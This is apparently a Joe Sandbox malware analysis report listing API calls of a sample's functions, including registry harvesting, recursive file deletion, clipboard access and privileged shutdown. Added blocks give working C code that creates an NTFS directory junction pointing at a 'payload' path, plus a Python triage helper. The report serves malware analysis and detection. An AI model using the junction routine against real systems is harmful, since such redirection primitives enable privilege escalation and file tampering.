• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 827c2cc99f6315855d0fb60b6345a8144ba2f38455d069a9878d7ed39c00eb47
• Instruction ID: 778401cbc9e73ac99e6b239ee7ed91f8aa7e6981f477a3322ec6edf58860addb
• Opcode Fuzzy Hash: 827c2cc99f6315855d0fb60b6345a8144ba2f38455d069a9878d7ed39c00eb47
• Instruction Fuzzy Hash: B0319271504249ABDB219FA0DC49FEB37FCEF89745F1041F6FA09D60A1EB7096888B24
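The call sequence listed for this routine (CreateDirectoryW, CreateFileW with flags 02200000, DeviceIoControl with control code 000900A4, RemoveDirectoryW on the error path, and the `\??\%s` format string) is the standard recipe for creating an NTFS directory junction: 02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, 000900A4 is FSCTL_SET_REPARSE_POINT, and `\??\` prefixes the target to form the NT path that is stored as the junction's substitute name. The following is an added example, not code recovered from the sample: it builds the REPARSE_DATA_BUFFER for a mount point by hand (so the layout can be inspected on any host) and, on Windows only, issues the same call sequence. The link and target paths are constructed placeholders, and the path encoder assumes ASCII input.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values the listing shows as raw numbers. FSCTL_SET_REPARSE_POINT is
   CTL_CODE(FILE_DEVICE_FILE_SYSTEM = 9, function 41, METHOD_BUFFERED, FILE_ANY_ACCESS). */
#define REPARSE_TAG_MOUNT_POINT      0xA0000003u
#define FSCTL_SET_REPARSE_POINT_CODE 0x000900A4u
#define REPARSE_HEADER_LEN        8   /* ReparseTag(4) + ReparseDataLength(2) + Reserved(2) */
#define MOUNT_POINT_FIELDS_LEN    8   /* four USHORT offset/length fields */

static void put_u16le(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put_u32le(uint8_t *p, uint32_t v) { put_u16le(p, (uint16_t)v); put_u16le(p + 2, (uint16_t)(v >> 16)); }
uint16_t reparse_u16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t reparse_u32(const uint8_t *p) { return reparse_u16(p) | ((uint32_t)reparse_u16(p + 2) << 16); }

/* UTF-16LE encode an ASCII string plus a terminating NUL; returns the byte
   length without the terminator. Assumption: paths are ASCII. */
static size_t put_utf16le(uint8_t *p, const char *s) {
    size_t n = 0;
    for (; *s; ++s, n += 2) put_u16le(p + n, (uint8_t)*s);
    put_u16le(p + n, 0);
    return n;
}

/* Build a REPARSE_DATA_BUFFER for a mount point (junction): substitute name
   "\??\<target>", print name "<target>", both NUL-terminated inside PathBuffer,
   exactly as mklink /J lays it out. Returns the total byte count to hand to
   DeviceIoControl, or 0 if the buffer is too small. */
size_t build_mount_point_reparse(const char *target, uint8_t *out, size_t cap) {
    char subst[512];
    if (snprintf(subst, sizeof subst, "\\??\\%s", target) >= (int)sizeof subst) return 0;
    size_t subst_len = strlen(subst) * 2, print_len = strlen(target) * 2;
    size_t data_len  = MOUNT_POINT_FIELDS_LEN + subst_len + 2 + print_len + 2;
    size_t total     = REPARSE_HEADER_LEN + data_len;
    if (data_len > 0xFFFF || total > cap) return 0;

    memset(out, 0, total);
    put_u32le(out + 0, REPARSE_TAG_MOUNT_POINT);
    put_u16le(out + 4, (uint16_t)data_len);          /* ReparseDataLength */
    put_u16le(out + 6, 0);                           /* Reserved */
    put_u16le(out + 8, 0);                           /* SubstituteNameOffset */
    put_u16le(out + 10, (uint16_t)subst_len);        /* SubstituteNameLength (no NUL) */
    put_u16le(out + 12, (uint16_t)(subst_len + 2));  /* PrintNameOffset (after the NUL) */
    put_u16le(out + 14, (uint16_t)print_len);        /* PrintNameLength (no NUL) */
    uint8_t *path = out + REPARSE_HEADER_LEN + MOUNT_POINT_FIELDS_LEN;
    put_utf16le(path, subst);
    put_utf16le(path + subst_len + 2, target);
    return total;
}

#ifdef _WIN32
#include <windows.h>
#include <winioctl.h>
/* Same order as the listing: create the empty directory, open it with
   FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (0x02200000) and
   GENERIC_WRITE, set the reparse point, and remove the directory if anything fails. */
int create_junction(const wchar_t *link, const char *target) {
    uint8_t buf[1024];
    size_t len = build_mount_point_reparse(target, buf, sizeof buf);
    if (!len || !CreateDirectoryW(link, NULL)) return 0;
    HANDLE h = CreateFileW(link, GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
                           FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, NULL);
    if (h == INVALID_HANDLE_VALUE) { RemoveDirectoryW(link); return 0; }
    DWORD ret = 0;
    BOOL ok = DeviceIoControl(h, FSCTL_SET_REPARSE_POINT, buf, (DWORD)len, NULL, 0, &ret, NULL);
    CloseHandle(h);
    if (!ok) RemoveDirectoryW(link);
    return ok ? 1 : 0;
}
#endif

int main(void) {
    uint8_t buf[1024];
    /* Constructed placeholder target; main only builds the buffer and creates nothing. */
    size_t n = build_mount_point_reparse("C:\\Users\\Public\\payload", buf, sizeof buf);
    printf("FSCTL_SET_REPARSE_POINT = 0x%08X\n", FSCTL_SET_REPARSE_POINT_CODE);
    printf("REPARSE_DATA_BUFFER: %u bytes, tag 0x%08X, ReparseDataLength %u\n",
           (unsigned)n, reparse_u32(buf), reparse_u16(buf + 4));
    return n ? 0 : 1;
}
```

On Windows, `create_junction(L"C:\\Users\\Public\\jn", "C:\\Users\\Public\\payload")` (placeholder paths) performs the listed sequence. Two properties matter when you see this pattern in a sample: FSCTL_SET_REPARSE_POINT needs only write access to the empty directory the caller just created, and the target is not validated when the junction is set, so it may point at a path the caller cannot otherwise reach or that does not exist yet.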
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B5A203
• FindNextFileW.KERNEL32(00000000,?), ref: 00B5A25E
• FindClose.KERNEL32(00000000), ref: 00B5A269
• FindFirstFileW.KERNEL32(*.*,?), ref: 00B5A285
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B5A2D5
• SetCurrentDirectoryW.KERNEL32(00BA7B94), ref: 00B5A2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B5A2FD
• FindClose.KERNEL32(00000000), ref: 00B5A30A
• FindClose.KERNEL32(00000000), ref: 00B5A31A
  • Part of subcall function 00B4E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B4E3B4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: c1266d41ff984ce5853e23367e35a551927962540da7e0836c6fa4f42f51dc0c
• Instruction ID: d44bf25ded100cc0d72597c54579ea0830fc7f93f79770da0c931a209ac69a9f
• Opcode Fuzzy Hash: c1266d41ff984ce5853e23367e35a551927962540da7e0836c6fa4f42f51dc0c
• Instruction Fuzzy Hash: 1231F2725042196EDB20AFA4DC4ABDE7BFCEF45365F1042D5EC14B30A0DB32DE898A65
APIs
  • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B6CA09
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6CA2D
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6CA8C
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B6CB47
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CBB4
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CC49
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6CC9A
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CD43
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6CDE2
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6CDEF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b216dec3635e7825968ec79fe57b98f7656e0b33e5944a941108a67efe63d7de
                                                                                                                                                                                                                                                                                    • Instruction ID: eed81006b88c0a2f06eab2cb9a199e68fbd7af21f626b42a4fcdc0cee41952b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b216dec3635e7825968ec79fe57b98f7656e0b33e5944a941108a67efe63d7de
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810250716042409FC715DF24C995E3ABBE5EF48314F1884ADF88ACB2A2DB35ED42CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B4D9CD
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B4DA88
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B4DA9B
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DAB8
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4DAE2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B4DAC7,?,?), ref: 00B4DB5D
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00B4DAFE
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DB0F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                    • Opcode ID: 50a07225467cc852ef1f38cd37d470f34f9ea742caae2bfc9c8a8bb14974ccec
                                                                                                                                                                                                                                                                                    • Instruction ID: 9cecbbdfbe0ff6d8b594e52083835c5f16ed04dcb32b3c2974623382e1a56fb4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50a07225467cc852ef1f38cd37d470f34f9ea742caae2bfc9c8a8bb14974ccec
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB615B3180514DAECF05EBA1DE969EEB7B5EF14300F2045A9E406B7192EF71AF09DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3de1eb1ff710082fcfa54dac22521aa78331c498c62bfc75eaef39e19e14a54a
                                                                                                                                                                                                                                                                                    • Instruction ID: 683273cc19330bbc046d793db8a516c830b6f4cbd7e525c0ce17ce12e17855b4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de1eb1ff710082fcfa54dac22521aa78331c498c62bfc75eaef39e19e14a54a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20417931604652EFE710DF15D888B25BBE4FF44359F14C4E9E8198B6A2CB35ED86CB90
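The per-function entries in this listing are the part of the report an analyst actually works from: the registry entry chains RegConnectRegistryW, RegOpenKeyExW and repeated RegQueryValueExW calls; the file entry walks a directory with FindFirstFileW/FindNextFileW over the "\*.*" pattern and deletes or moves each hit; the clipboard entry lists no APIs at all and survives only as its Similarity "API ID" (Clipboard$AllocCloseEmptyGlobalOpen); and the SeShutdownPrivilege entry combines LookupPrivilegeValueW, AdjustTokenPrivileges and ExitWindowsEx. Below is an added triage helper, not Joe Sandbox code and not part of the original report, that parses this plain-text format and flags those API combinations. It assumes that the "API ID" is built from the API names with the Get/Reg prefixes and Ex/W suffixes dropped (as the report's own lines suggest: RegQueryValueExW appears as QueryValue) so that an entry with an empty API list can still be classified; the rule names and the SAMPLE text are constructed for illustration, the latter from lines visible in this report.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example,
not Joe Sandbox code). Parses the plain-text "APIs" / "Similarity" blocks of
function entries and flags API combinations worth an analyst's attention.
Rule names, the token normalisation and SAMPLE are assumptions/constructed."""
import re

# One "APIs" line, e.g.
#   • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6CA8C
#   • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
TOKEN = re.compile(r"_[a-z0-9]+|[A-Z][a-z0-9]*")  # CamelCase pieces; CRT names whole
# Assumption drawn from the report's own lines: its "API ID" drops these pieces
# (RegQueryValueExW -> QueryValue), so full names are normalised the same way.
NOISE = {"Get", "Reg", "Ex", "W", "A"}

# Every token in the set must be present for the behaviour to be flagged.
RULES = {
    "registry_value_harvest": {"Registry", "Open", "Query", "Value"},
    "recursive_file_delete_move": {"Find", "First", "Next", "File", "Delete", "Move"},
    "clipboard_access": {"Clipboard", "Open", "Close"},
    "privileged_shutdown": {"Lookup", "Privilege", "Adjust", "Token",
                            "Privileges", "Exit", "Windows"},
}
STRING_HINTS = {"SeShutdownPrivilege": "shutdown_privilege_string",
                r"\*.*": "wildcard_directory_walk"}


def name_tokens(name):
    """Token set of one API name or of one '$'-group of an API ID."""
    return {t for t in TOKEN.findall(name) if t not in NOISE}


def parse_blocks(text):
    """One dict per function entry, starting at each 'APIs' header."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "strings": "", "api_id": ""}
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := API_LINE.match(line)):
            cur["apis"].append((m["api"], m["mod"], m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            cur["strings"] = line.split(":", 1)[1].strip()
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
    return blocks


def triage(text):
    """Per entry: where the names came from, a call summary, flagged behaviours."""
    out = []
    for b in parse_blocks(text):
        if b["apis"]:
            source, names = "apis", [a[0] for a in b["apis"]]
        else:  # entry lists no APIs, but the Similarity "API ID" encodes them
            source, names = "api_id", b["api_id"].split("$")
        toks = set().union(*(name_tokens(n) for n in names))
        hits = {tag for tag, need in RULES.items() if need <= toks}
        hits |= {tag for s, tag in STRING_HINTS.items() if s in b["strings"]}
        out.append({"source": source, "calls": len(b["apis"]),
                    "subcalls": {a[3] for a in b["apis"] if a[3]},
                    "modules": sorted({a[1] for a in b["apis"]}),
                    "behaviours": sorted(hits)})
    return out


# Constructed from API lines visible in this report (indentation trimmed).
SAMPLE = r"""
APIs
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B6CA09
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6CA8C
• RegCloseKey.ADVAPI32(00000000), ref: 00B6CDEF
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00B4D9CD
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DAB8
• MoveFileW.KERNEL32(?,?), ref: 00B4DA9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4DAE2
  • Part of subcall function 00B4DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B4DAC7,?,?), ref: 00B4DB5D
Similarity
• String ID: \*.*
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
APIs
  • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
  • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
• ExitWindowsEx.USER32(?,00000000), ref: 00B4F249
Similarity
• String ID: $ $@$SeShutdownPrivilege
"""

if __name__ == "__main__":
    for i, r in enumerate(triage(SAMPLE)):
        print(i, r["source"], r["calls"], r["modules"], r["behaviours"])
```

The token rules are deliberately loose: the same FindFirstFileW/DeleteFileW/MoveFileW shape is also what an installer's cleanup routine looks like, so a hit is a prompt to open the function at the listed ref address, not a verdict. The "String ID" corroboration (SeShutdownPrivilege next to AdjustTokenPrivileges, the "\*.*" wildcard next to the Find loop) is what raises a hit from "worth a look" to "explain this before closing the case".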
APIs
  • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
  • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
  • Part of subcall function 00B42010: GetLastError.KERNEL32 ref: 00B42097
• ExitWindowsEx.USER32(?,00000000), ref: 00B4F249
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: 3c270b6dcaa8b1c0c7f553b15502077a83b4eb02b8b9dbc6956855bdb733e79d
                                                                                                                                                                                                                                                                                    • Instruction ID: 7013ca617f8083ce56d6c7e6b99ad1d8b6e5a79c271d44423ae4755a367ab483
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c270b6dcaa8b1c0c7f553b15502077a83b4eb02b8b9dbc6956855bdb733e79d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2601A27A6142116BEF1466B89CCABBB72ECDF08384F1505B1F912F31D2D9A09E41B590
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BD54
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BD78
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1BEFF
                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B846D0), ref: 00B1BF11
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00BB221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B1BF89
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00BB2270,000000FF,?,0000003F,00000000,?), ref: 00B1BFB6
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1C0CB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e66ea313fd76ba7b4bf6f19a2d3fc74bbd1ce0a55d7908ce39d2defc8fa2c5cf
                                                                                                                                                                                                                                                                                    • Instruction ID: 56651c42793e76388902ad62dd0b8293f102f28f7058434b6fe373a3ec3a490a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66ea313fd76ba7b4bf6f19a2d3fc74bbd1ce0a55d7908ce39d2defc8fa2c5cf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35C107729002059FDB249F68DC41EEABBF9EF45310F9445EAE585DB291EB708EC2CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B256C2,?,?,00000000,00000000), ref: 00B53A1E
                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B256C2,?,?,00000000,00000000), ref: 00B53A35
                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE), ref: 00B53A45
                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE), ref: 00B53A56
                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00B256C2,?,?,00B256C2,?,?,00000000,00000000,?,?,?,?,?,?,00AE66CE,?), ref: 00B53A65
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                    • API String ID: 3051347437-3967369404
